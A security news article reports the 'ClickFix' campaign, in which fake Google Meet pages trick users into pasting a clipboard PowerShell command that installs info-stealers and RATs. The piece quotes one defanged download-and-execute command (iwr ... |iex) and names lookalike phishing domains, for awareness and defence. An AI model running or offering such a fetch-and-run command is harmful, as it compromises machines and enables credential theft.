A sophisticated social engineering campaign that leverages fake Google Meet conference pages to trick users into manually executing malicious PowerShell commands, leading to system compromise through various information-stealing malware, including AsyncRAT, StealC, and Rhadamanthys.
This emerging threat, known as “ClickFix,” represents a dangerous evolution in phishing tactics that bypasses traditional security measures by exploiting human behavior rather than technical vulnerabilities.
Deceptive Social Engineering Mechanism
Sucuri reports that the attack begins with carefully crafted phishing emails that appear as legitimate Google Meet invitations, directing victims to fraudulent URLs such as meet.google.us-join.com and meet.googie.com-join.us.
.png
)
When users click these links, they encounter meticulously designed fake Google Meet interfaces that display convincing “Microphone Permission Denied” error messages.
The malicious page employs JavaScript event listeners to simulate legitimate functionality while presenting victims with fake technical problems requiring immediate resolution.
The social engineering tactic centers around a deceptive “Ready to Join?” section that triggers a modal dialog claiming “Can’t join the meeting” when users attempt to participate.
This modal contains a “Try Fix” button that, when clicked, executes the copyToClipboard() function, silently copying a malicious PowerShell command to the user’s clipboard.
The subsequent instructions guide unsuspecting victims to open PowerShell and paste the command using simple key combinations like Win+R and Ctrl+V.
The malicious PowerShell command typically follows the pattern: powershell -w 1 iwr hxxp://[REDACTED]/1/XR.txt -UseBasicParsing|iex.
The report states that this command downloads and executes obfuscated scripts from compromised websites, often containing XOR-encoded malware payloads.
Security analysis reveals that the downloaded XR.txt file contains heavily obfuscated PowerShell scripts designed to decode themselves at runtime and execute malicious code directly in memory.
The payload begins with a social engineering decoy, displaying a “Verification complete!” message box using [System.Windows.Forms.MessageBox]::Show() to reassure victims while malicious operations continue in the background.
The core malicious functionality employs regex matching and XOR decoding techniques to dynamically construct and execute commands that ultimately install Remote Access Trojans (RATs) such as the noanti-vm.bat file.
Advanced variants target both Windows and macOS systems, with Windows users receiving StealC and Rhadamanthys stealers, while Apple users encounter booby-trapped disk image files containing Atomic stealer malware.
The malware establishes persistence by installing files in the $env:AppData directory and creating batch scripts with heavily obfuscated commands using environment variable manipulation.
Defense Strategies
This attack vector proves particularly dangerous because it circumvents traditional browser security features like Google Safe Browsing by requiring manual user interaction rather than automated file execution.
The technique has been attributed to threat groups including TA571, Slavic Nation Empire, and Scamquerteo, with campaigns observed across multiple industries since March 2024.
Organizations must implement comprehensive security awareness training, emphasizing that legitimate services never require users to execute PowerShell commands from email instructions.
Technical defenses should include endpoint detection and response solutions capable of monitoring PowerShell execution, implementing application whitelisting, and deploying web application firewalls to block access to known malicious domains.
Regular malware scanning, strong access controls, and input validation remain critical components of a layered security approach to mitigate these sophisticated social engineering attacks.
Equip your SOC team with deep threat analysis for faster response -> Get Extra 𝗦𝗮𝗻𝗱𝗯𝗼𝘅 𝗹𝗶𝗰𝗲𝗻𝘀𝗲𝘀 for Free
